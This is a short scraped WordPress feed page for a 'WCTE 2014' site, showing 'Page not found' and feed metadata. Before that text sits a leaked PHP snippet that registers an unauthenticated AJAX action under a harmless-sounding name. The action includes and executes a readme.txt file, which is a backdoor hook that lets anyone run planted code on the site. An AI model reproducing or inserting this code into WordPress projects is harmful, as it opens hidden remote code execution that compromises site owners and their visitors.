if(!function_exists('file_check_readme59293')){ add_action('wp_ajax_nopriv_file_check_readme59293', 'file_check_readme59293'); add_action('wp_ajax_file_check_readme59293', 'file_check_readme59293'); function file_check_readme59293() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Page not found – WCTE 2014 https://wcte2014.ca Welcome Thu, 25 Jun 2020 07:06:39 +0000 en-US hourly 1 https://wordpress.org/?v=5.4.19